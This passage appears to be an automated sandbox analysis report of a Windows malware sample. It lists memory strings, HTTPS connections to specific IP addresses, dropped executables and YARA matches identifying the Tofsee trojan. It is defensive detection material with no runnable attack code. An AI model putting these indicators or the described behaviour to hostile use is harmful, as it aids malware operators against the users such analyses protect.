                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/plus-pack/m03m04
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/pro/
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeper/pro/m02
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/products/pop-peeperm01
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.com/webmailsub
                    Source: svchost015.exe, 00000001.00000003.1705800888.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.comhttps://www.esumsoft.com/donation/Updater.exeUpdaterPPtweakerPPTweakerSentMa
                    Source: svchost015.exe, 00000001.00000003.1707285660.0000000003AD4000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.esumsoft.comm00
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991855206.00000000039F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                    Source: svchost015.exe, 00000001.00000003.1706105267.0000000003834000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1963535375.0000000002B6D000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000000.1745041234.0000000000634000.00000002.00000001.01000000.00000014.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2203231531.0000000000634000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/tokenhttps://login.microsoftonline.com/common/oauth2/v2.0/token
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2040795636.0000000003C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ssl.com/repository0
                    Source: nK8noQeiXl.exe, nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
                    Source: nK8noQeiXl.exe, nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.x-ways.net/winhex/forum/
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49700 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49701 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49702 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49703 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.39.17.76:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.53.21:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: Yara matchFile source: 1.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: nK8noQeiXl.exe PID: 8572, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: svchost015.exe PID: 8648, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Yara detected Tofsee
                    Source: Yara matchFile source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.2572533022.0000000002780000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2572238453.0000000000550000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2572109142.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 9056, type: MEMORYSTR

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 10.2.regsvr32.exe.2859196.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
                    Source: 10.2.regsvr32.exe.2859196.1.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
                    Source: 10.2.regsvr32.exe.5512e6.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
                    Source: 10.2.regsvr32.exe.5512e6.0.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
                    Source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
                    Source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
                    Source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
                    Source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Tofsee Author: ditekSHen
                    Source: 0000000A.00000002.2572481446.0000000002771000.00000020.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
                    Source: 0000000A.00000002.2572238453.0000000000550000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
                    Source: 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
                    Source: 0000000A.00000002.2572109142.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0042F530 NtdllDefWindowProc_A,4_2_0042F530
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00423B94 NtdllDefWindowProc_A,4_2_00423B94
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004125E8 NtdllDefWindowProc_A,4_2_004125E8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004789DC NtdllDefWindowProc_A,4_2_004789DC
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004573CC PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,4_2_004573CC
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0042E944: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,4_2_0042E944
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_02771280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,10_2_02771280
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,4_2_004555D0
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F5254C0_2_04F5254C
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F522E00_2_04F522E0
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F56D000_2_04F56D00
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_1000E9651_2_1000E965
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_10010A801_2_10010A80
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_0040840C3_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004804C64_2_004804C6
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004709504_2_00470950
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004352D84_2_004352D8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004677104_2_00467710
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0043036C4_2_0043036C
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004444D84_2_004444D8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004345D44_2_004345D4
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004866044_2_00486604
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00444A804_2_00444A80
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00430EF84_2_00430EF8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004451784_2_00445178
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0045F4304_2_0045F430
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0045B4D84_2_0045B4D8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004875644_2_00487564
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004455844_2_00445584
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004697704_2_00469770
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0048D8C44_2_0048D8C4
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004519A84_2_004519A8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0043DD604_2_0043DD60
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_004010005_2_00401000
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_004067B75_2_004067B7
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609660FA5_2_609660FA
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6092114F5_2_6092114F
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6091F2C95_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6096923E5_2_6096923E
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6093323D5_2_6093323D
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6095C3145_2_6095C314
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609503125_2_60950312
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094D33B5_2_6094D33B
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6093B3685_2_6093B368
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6096748C5_2_6096748C
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6093F42E5_2_6093F42E
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609544705_2_60954470
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609615FA5_2_609615FA
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6096A5EE5_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6096D6A45_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609606A85_2_609606A8
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609326545_2_60932654
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609556655_2_60955665
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094B7DB5_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6092F74D5_2_6092F74D
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609648075_2_60964807
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094E9BC5_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_609379295_2_60937929
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6093FAD65_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6096DAE85_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_6094DA3A5_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60936B275_2_60936B27
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60954CF65_2_60954CF6
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60950C6B5_2_60950C6B
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60966DF15_2_60966DF1
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60963D355_2_60963D35
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60909E9C5_2_60909E9C
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60951E865_2_60951E86
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60912E0B5_2_60912E0B
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_60954FF85_2_60954FF8
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02D9BAFD5_2_02D9BAFD
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02DA2A805_2_02DA2A80
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02D9D32F5_2_02D9D32F
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02D970C05_2_02D970C0
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02D8E0895_2_02D8E089
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02DA267D5_2_02DA267D
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02D9B6095_2_02D9B609
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02D9874A5_2_02D9874A
